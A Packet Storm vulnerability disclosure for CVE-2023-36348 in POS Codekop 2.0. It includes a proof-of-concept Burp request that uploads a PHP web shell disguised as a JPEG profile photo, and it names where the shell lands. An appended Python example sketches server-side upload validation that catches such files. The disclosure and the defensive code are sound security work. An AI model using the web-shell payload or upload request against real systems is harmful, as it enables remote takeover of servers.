packetstorm · Yuyudhn · PACKETSTORM:173278
Jul 04, 2023 - 12:00 a.m.

POS Codekop 2.0 Shell Upload

2023-07-04 00:00:00
yuyudhn
packetstormsecurity.com
codekop v2.0, authenticated remote code execution, unsanitized filename, php, file upload, vulnerability, cve-2023-36348, linux, security

EPSS: 0.003 (Low), percentile 69.9%

`# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)  
# Date: 25-05-2023  
# Exploit Author: yuyudhn  
# Vendor Homepage: https://www.codekop.com/  
# Software Link: https://github.com/fauzan1892/pos-kasir-php  
# Version: 2.0  
# Tested on: Linux  
# CVE: CVE-2023-36348  
# Vulnerability description: The application does not sanitize the filename  
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An  
attacker can exploit this issue by uploading a PHP file and accessing it,  
leading to Remote Code Execution.  
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/  
  
# Proof of Concept:  
1. Log in to the POS Codekop dashboard.  
2. Go to profile settings.  
3. Upload a PHP script through Upload Profile Photo.  
  
Burp Log Example:  
```  
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1  
Host: localhost  
Content-Length: 8934  
Cache-Control: max-age=0  
sec-ch-ua:  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/research/pos-kasir-php/index.php?page=user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv  
Connection: close  
  
------WebKitFormBoundarymVBHqH4m6KgKBnpa  
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"  
Content-Type: image/jpeg  
  
ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>  
ΓΏΓ›C  
  
-----------------------------  
```  
PHP Web Shell location:  
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php  
  
`
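The request above declares `image/jpeg` and begins with a JPEG header, so a check on the declared type or on magic bytes alone would accept it. The following is an added example, not code from the advisory or from the POS Codekop project, sketching in Python the server-side validation the upload handler lacks: an extension allow-list, a content scan, and a server-chosen stored name. The function names, marker list and sample request are assumptions made for illustration.

```python
import os
import secrets
from email.parser import BytesParser

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"__halt_compiler")

def check_upload(content_type: str, body: bytes) -> dict:
    """Return {client filename: [findings]} for each file part of a multipart body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    report = {}
    for part in BytesParser().parsebytes(raw).walk():
        name = part.get_filename()
        if name is None:  # multipart container or plain form field
            continue
        data = part.get_payload(decode=True) or b""
        ext = os.path.splitext(name)[1].lower()
        findings = []
        if ext not in ALLOWED_EXT:
            findings.append("extension not allowed: " + (ext or "(none)"))
        elif not data.startswith(MAGIC[ext]):
            findings.append("content does not match extension")
        if any(marker in data.lower() for marker in SCRIPT_MARKERS):
            findings.append("script marker in file body")
        report[name] = findings
    return report

def stored_name(client_name: str) -> str:
    """Random stem plus allow-listed extension; nothing else from the client is kept."""
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("rejected upload: " + (ext or "(none)"))
    return secrets.token_hex(16) + ext

# Constructed sample: JPEG magic bytes followed by an inert PHP-style marker.
BOUNDARY = "----constructedBoundary"
SAMPLE_CT = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = (
    b"--" + BOUNDARY.encode() + b"\r\n"
    b'Content-Disposition: form-data; name="foto"; filename="photo.php"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0JFIF<?php /* inert marker */ ?>\r\n"
    b"--" + BOUNDARY.encode() + b"--\r\n"
)

if __name__ == "__main__":
    print(check_upload(SAMPLE_CT, SAMPLE_BODY))
```

Renaming the same body to `photo.jpg` passes the extension and magic-byte checks and is caught only by the content scan, which is why the stored name and extension must be chosen by the server and the upload directory should not execute scripts.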
